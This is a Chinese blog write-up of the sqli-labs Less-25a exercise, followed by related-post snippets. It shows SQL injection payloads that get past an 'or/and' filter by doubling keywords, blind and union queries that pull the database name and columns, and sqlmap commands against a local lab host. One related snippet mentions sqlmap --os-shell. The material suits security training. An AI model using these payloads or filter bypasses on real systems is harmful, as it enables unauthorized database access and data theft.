Less-25(绕过or或and--盲注)

最新推荐文章于 2022-08-21 08:53:30 发布
最新推荐文章于 2022-08-21 08:53:30 发布
阅读量521 收藏
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/107317946
版权

文章目录

1. 题目分析

根据less24的经验以及通过?id=1 aandnd 1=2 --+?id=1 aandnd 1=1 --+可以判断出id的类型为int;并且可以使用盲注或联合查询两种方法解决的题目。

一下主要回顾盲注的解题思路:
False页面:
在这里插入图片描述
True页面:
在这里插入图片描述
之前学习过盲注,我们知道盲注主要分为布尔盲注和时间盲注,同时再回忆一下要使用的函数:

  • length() :判断字长
  • substr(): 从字符串中取字
  • ascii() : 利用ascii爆破字符串的值

2. 注入思路

2.1 盲注

盲注是一个非常麻烦的事情,这里就简单说一下破解数据库名字的步骤,后面的爆表等过程在Less-8有详细讲过。

首先我们要确定使用的databases()的长度:
通过尝试得出(同时要注意绕过orand的过滤)

?id=1 aandnd length(database())=8 --+

得知数据库名字的长度是8

然后利用ascii()+substr()猜解每一个字母。

id=1 aandnd ascii(substr(database(), 1, 1))=115 --+

这样猜出第一个字母的ascii为115,对应字母s
以此类推,直到猜解全部字符为security

2.2 联合注入

给出一条查询字段的payload

?id=-1 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name="users" aandnd table_schema="security"),3 --+

联合注入很简单,和Less-25基本没有区别。

3. SQLmap注入

盲注类型的题目手注起来是最浪费时间的,在了解原理和手法以后,直接用工具做是比较优的选项。当然如果你对手注有着别样的执着,你可以选择手动挡,这里我就用自动挡了。

打开SQLmap:
首先判断当前数据库的名字:

sqlmap -u 192.168.0.xxx:7788/sqli/Less-25a/?id=1 --batch --current-db

在这里插入图片描述
SQLmap果然还是强,光payload就整了三种,这里PHP版本,Apache版本都整出来了。

然后我们看一下security数据库下面有哪些数据表

sqlmap -u 192.168.0.xxx:7788/sqli/Less-25a/?id=1 --batch --tables

在这里插入图片描述
接着看一下users表中的字段都有什么

sqlmap -u http://192.168.0.106:7788/sqli/Less-25a/?id=-1 -T users --columns --fresh-queries

但是不知道为什么这里SQLmap翻车了,users字段只能检索到idusername

关掉--batch参数,跟着提示来发现一个问题:
这里SQLmap说他不能检索字段,因此要用一个文件去一个一个的匹配:
在这里插入图片描述
而默认使用的文件是/usr/share/sqlmap/data/txt/common-columns.txt,查看这个文件后。我想到可能是SQLmap使用的password被过滤成为了passwd因此检索不出来。我在里面加了一个passwoorrd后发现可以了。
在这里插入图片描述
其实SQLmap可以使用脚本来进行绕过,不过我还没了解过这方面的使用,因此只能这样解题了。等对SQLmap掌握的更熟练以后,我会补充上去的。

老司机开代码
关注
专栏目录
23-5 绕过去除 union 和 select 的 SQL 注入
weixin_43263566的博客
02-07 941
在MySQL中,默认情况下,数据库名、表名在Unix、Linux系统上是区分大小写的,而在Windows系统上则不区分大小写。但是,SQL语句中的关键字(如SELECT、INSERT)、函数名(如MAX()、COUNT())以及列名和别名通常是不区分大小写的。但是,对于字符串值的比较,默认是区分大小写的。下面,我将简要介绍一些MySQL的基础知识,以及您提到的一些特殊编码和替换技巧。在某些安全性较低的应用场景中,攻击者可能会尝试通过改变查询语句的格式来绕过安全过滤器,执行SQL注入等恶意操作。
SQLi-LABS Less-25&&Less-25a
m0_64898960的博客
04-26 2098
Less-25题目 进入题目看到这样的一句话,英语不好 百度翻译 好吧,试了下,只是回显输入的语句,个人感觉没啥用…闭合条件为“ ’ ”,而且好像可以用注释符了… 查字段,看图片提示好像不可以使用or和and,应该是此处不能用order by来查的原因所以改用union select 查数据库 接下来正常的联合查询是有or的,如information…所以我们得另寻道路 尝试大小写如INFORMATION,报错 大小写如infOrmation,报错。猜测大小写是绕不过了… 尝试hex编码(url
Less-25 (绕过AND OR 过滤)
老司机开代码的博客
08-04 675
文章目录1. 题目分析2. 源码分析3. 注入过程 1. 题目分析 这一关还是一个基于GET的注入,还是要先构造一个ID作为参数给他传进去。因为题目给的是string single quote,所以ID的类型一定是单引号包裹的了。 根据一往的经验,两条语句一看便知。那么这道关卡的考点在哪里呢? 当我使用order by测试检索字段的时候,就出现了问题。 这里我明明输入的order by结果报错就只剩下了der by,根据题目上的or and and belong to us我们不难猜测,可能自己输入的
LESS-23 LESS-25 LESS-25a
qq_44598397的博客
03-30 290
LESS-23 源码: 以此可知可以通过报错注入等方式 语法: mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int KaTeX parse error: Expected 'EOF', got '&' at position 19: …it = -1 [, int &̲c...
Sqli-labs之Less-25和Less-25a
→_→
04-21 955
Less-25 GET-基于错误-您所有的OR&AND都属于我们-字符串单引号 Notice: Undefined variable: hint in C:\phpStudy\WWW\sqli\Less-25\index.php on line 81 Hint: Your Input is ...
sqli-labs————less 25(绕or\and)
Fly_鹏程万里
05-12 1007
Less-25从关卡提示,我们可以知晓该关卡主要过滤了“or”和“and”,那么我们看看它的源代码到底是如何过滤的:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns...
SQL-WAF绕过
qq_64332865的博客
02-22 4033
实验原理 WAF (Web Application Firewall)的中文名称叫做"Web应用防火墙",通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止SQL注入.跨站脚本(XSS)、文件包含和安全配置错误等漏洞引发的攻击。 作为攻击者来说,常见的绕过WAF的方式包括大小写变换、编码、重写、巧用注释符、巧用盲注、同功能函数替换等。 其中,重写适用于WAF只过滤一次敏感字的情况。比如 WAF过滤敏感字union. 但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执
sqli-labs ----less-26---37--练习
代码审计
03-07 973
sqli-labs————Less-26(绕空格、/*、#等) 该关卡提示空格和注释被转义,我们测试一下: http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错, 我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm
sqli-labs学习笔记(九)less 25-28 各种过滤
闵行小鱼塘
09-15 519
继续学习sqli-labs,本篇是less 25-28
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1338
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
8-Web安全——SQL注入WAF绕过之and,or,空格
网络安全
06-03 5334
1. and和or绕过 and和or的作用: and关键字表示同时满足两个条件,例如测试字符型注入和数字型注入用到的and 1=1和and1=2两个条件语句。 or表示满足其中一个条件即可,例如报错注入时用到的or语句 下面是后台过滤and和or关键字的源代码: function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_repl.
sqli-labs (less25-less28a)
Xi4or0uji
08-04 425
这里开始就是各种花式绕waf了,肉鸡打算把它们放在一篇,所以可能会很长 less 25 or && and 至于怎么绕? 大小写:Or、oR 重复:oorr、anandd 符号:&&、|| 各种编码:0x.....、unicode 然后..........没有然后了(想不到了 剩下的payload顺便给一给 ?id=1' oorr extract...
sqli-labs\Less 25~30
Gjqhs的博客
03-11 1113
less-25——过滤了or和and的单引号注入 http://127.0.0.1/sqli-labs/Less-25/?id=-1%27%20union%20select%201,2,3--+ less-26——基于单引号字符型过滤了注释和空格的注入 http://127.0.0.1/sqli-labs/Less-26/?id=-1%27aandnd(updatexml(1,%27aaaa%27,1))anandd%271%27=%271 less-27——基于’字符型过滤了unio.
SQL注入 绕过and和or过滤
m_de_g的博客
12-09 3533
SQL注入 绕过and和or过滤 1.基础知识介绍 1.MySQL中的大小写不敏感,大写与小写一样。 2.MySQL中的十六进制与URL编码 3.符号和关键字替换and – &&、or–|| 4.内联注释与多行注释 /*! 内联注释*/ /*多行注释*/ 2.去除and和or的代码分析 3.绕过去除and和or的SQL注入 1.大小写变形,Or,OR,oR,OR,And,ANd,aND等 代码中大小写不敏感都被剔除 2.在这两个敏感词汇中添加注释,例如:a/**/nd 双写绕过 oorr
生命在于折腾——SQL注入的实操(五)less21-25
易水哲的博客
08-21 423
sql-lib项目,本篇文章介绍关卡21-25。 闭合变成了双引号,其余和上一关一样。 这一关过滤了注释符号,不看php文件会感觉无从下手,查看源代码发现吧# --+注释符号给过滤掉了,这里使用’。输入http://sql/Less-23/?id=’ union select 1,13,database() ’ 输入http://sql/Less-23/?id=’ union select 1,2,group_concat(table_na
SQL注入之盲注
qq_45691294的博客
07-12 673
盲注 盲注也可以叫做布尔型注入,主要使用在存在SQL注入漏洞但是不能直接查询爆出内容的地方,主要依靠逻辑的真假来实现爆出数据,盲注的效率相对较低。 盲注主要分为普通型盲注和时间盲注(延时注入),普通型注入主要看逻辑真假返回时页面的不同进行判断,而延时注入用于页面没有任何数据返回且逻辑不管真假前端页面也无不同的请况下。 在联合注入中我们就给出了有关字符串的一些函数,在盲注中也需要使用到这些函数。 length() # 返回字符串的长度 substring() substr()
渗透测试25---SQLMAP技术进阶
初遇我ㄖ寸の热情呢?
04-14 7571
SQLMAP的原理和进阶 拿 shell sqlmap -u "http://192.168.1.9/sqli-labs/Less-1/?id=1" --os-shell(演示的时候,尽量选择linux是受害者) 从数据库中读取文件 借助于sqlmap这个工具,可以读取出受害者机器上的任何文件 sqlmap -u "http://192.168.1.9/sqli-labs/Less-1/...
Weightless-P:新型窄带物联网协议,低功耗远程通信解决方案
"Weightless-P是一种新兴的窄带物联网(IoT)通信协议,与LoRa和NB-IoT有所不同,旨在实现低功耗、低速率的无线远程传输,同时保证通讯的可靠性与安全性。该协议由多个组织的专家共同开发,包括Ubiik、ARM、CSR、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值